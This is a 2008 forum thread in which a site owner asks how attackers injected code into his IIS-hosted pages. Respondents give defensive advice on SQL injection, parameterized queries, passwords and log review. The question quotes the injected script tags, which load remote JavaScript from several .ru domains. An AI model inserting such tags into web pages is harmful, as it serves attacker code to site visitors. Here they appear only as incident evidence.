Solved

regarding IIS server hack

Posted on 2008-10-29
4
587 Views
Last Modified: 2013-12-04
Hi,

We have Verio/Ntt Windows shared Hosting Plans and we configure our imp. client on their, this is Global client website, this way some of hackers always try to hack this website, this website also connect with SQL server 2005 database,
But presently hacker are able to hack the static and dynamic pages (.asp and .html), We have found that the following script in our web pages,
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<script src=http://www.lang42.ru/script.js></script><script src=http://www.errghr.ru/script.js></script>
<script src=http://www.berjke.ru/script.js></script>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I got the following links which is related   the website hack issue
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Kindly let me know how I can check my whole website and also sql server to know that how hacker hack our website and also how I can secure our server

Regards,
Naresh
0
Comment
Question by:sitg
  • 2
4 Comments
 
LVL 32

Expert Comment

by:Daniel Wilson
ID: 22831130
If they changed static pages, it's not JUST a SQL injection.

Did stuff in the database change?  Or just your pages?

If stuff in the DB changed, suspect a SQL injection.  The classic method for hardening against that attack is parameterization of all queries that accept user input.  

e.g. sql = "Select * from Users where Username = '" + Request("Username") + "' "
becomes
sql = "Select * from Users where Username = @UserName"
command.parameters.add ("@userName", Request("Username"))

For the non-SQL-Injection hack ... look at IIS security.
0
 
LVL 2

Expert Comment

by:devshb
ID: 22839639
DanielWilson is right in my opinion; the physical attack/change of the html files does indicate a server/ftp (or possible cms-system admin) security problem rather than just a simple data vulnerability problem.

However, you might have both (physical attacks on the files, and injections/xss to the data)

For data:
Take a look at:
http://www.sqlinjectionscanner.com/

They've got a free data scanner; you can use that to double-check if there's any injected data hanging around in the database.

Securing your code/database is obviously a good idea, but hackers will almost always find any vulnerabilities you might have, so it's a good idea to have a reliable full-scan tool available which is dedicated to the task of checking against injected data/xss attacks in the data.

ie click on the download free version of the "ASP SQL Injection Scanner Tool"

I think the physical attack on the files is more pressing than a potential data injection though, because if they can physically change your files then you need to get that aspect secured first. eg change all your helm/ftp pwds, and look into the logfiles to see if people are using, say, your own cms admin system (if you have one) to effect the files.

Usually a physical attack like this would be due to a server managing to somehow get onto the server, you might need to totally reformat the server in order to find it because some viruses are buried so deeply that anti-virus software can't find them.

So, I'd say, change all your pwds, look into the logfiles, and check with the host to see if a virus is actually on the server itself.
0
 
LVL 2

Expert Comment

by:devshb
ID: 22839648
"Usually a physical attack like this would be due to a server managing to somehow get onto the server"

I meant:

"Usually a physical attack like this would be due to a *virus* managing to somehow get onto the server"

(sorry)
0
 

Accepted Solution

by:
sitg earned 0 total points
ID: 23053650
I have run the Acunetix Web Vulnerability Scanner and resolve this issue,
lots of web pages having sql injection issue.

Regards,
Naresh
0

Featured Post

Windows Server 2016: All you need to know

Learn about Hyper-V features that increase functionality and usability of Microsoft Windows Server 2016. Also, throughout this eBook, you’ll find some basic PowerShell examples that will help you leverage the scripts in your environments!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Many of us in IT utilize a combination of roaming profiles and folder redirection to ensure user information carries over from one workstation to another; in my environment, it was to enable virtualization without needing a separate desktop for each…
OfficeMate Freezes on login or does not load after login credentials are input.
The Email Laundry PDF encryption service allows companies to send confidential encrypted  emails to anybody. The PDF document can also contain attachments that are embedded in the encrypted PDF. The password is randomly generated by The Email Laundr…

839 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question